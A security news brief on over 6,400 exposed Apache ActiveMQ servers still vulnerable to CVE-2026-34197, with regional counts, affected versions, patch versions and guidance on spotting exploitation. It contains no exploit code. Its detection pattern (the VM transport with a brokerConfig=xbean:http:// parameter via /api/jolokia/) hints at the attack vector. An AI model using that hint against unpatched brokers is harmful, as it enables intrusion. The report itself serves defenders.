6,400 exposed Apache ActiveMQ servers still vulnerable to actively exploited CVE-2026-34197 - ShadowServer data shows Asia most impacted

Day-after follow-up to our April 18 coverage: Shadowserver has published telemetry showing 6,400+ Apache ActiveMQ servers exposed online are still vulnerable to CVE-2026-34197, the 13-year-old code injection flaw CISA added to KEV last week with an April 30 federal patch deadline. Geographic breakdown: Asia leads with 2,925 vulnerable servers, North America follows at 1,409, Europe at 1,334. Horizon3's Naveen Sunkavally (who discovered the flaw using the Claude AI assistant as his research tool) is urging admins to treat this as high priority, noting ActiveMQ has been a repeated target for real-world attackers - CVE-2016-3088 and CVE-2023-46604 are both on KEV, with the latter used as a zero-day by the TellYouThePass ransomware gang. The Apache maintainers patched the flaw on March 30 in ActiveMQ Classic 6.2.3 and 5.19.4. Horizon3 recommends searching broker logs for suspicious connections using the internal VM transport protocol with the brokerConfig=xbean:http:// query parameter as an indicator of exploitation.

Check

If you haven't patched ActiveMQ since March 30, check now. ShadowServer data shows thousands of exposed servers are still unpatched two weeks after the advisory.

Affected

Apache ActiveMQ Classic versions 5.x before 5.19.4, and 6.0.0 before 6.2.3, with the Jolokia JMX-HTTP bridge exposed via the web console at /api/jolokia/. ShadowServer identifies 6,400+ internet-exposed vulnerable instances as of April 20.

Fix

Upgrade to ActiveMQ Classic 5.19.4 or 6.2.3. For retroactive detection, search broker logs for connections using the internal VM transport protocol combined with the brokerConfig=xbean:http:// parameter - this pattern indicates an exploitation attempt regardless of success. If an exploit signature is found, treat the broker host as potentially compromised and rotate all credentials that passed through it.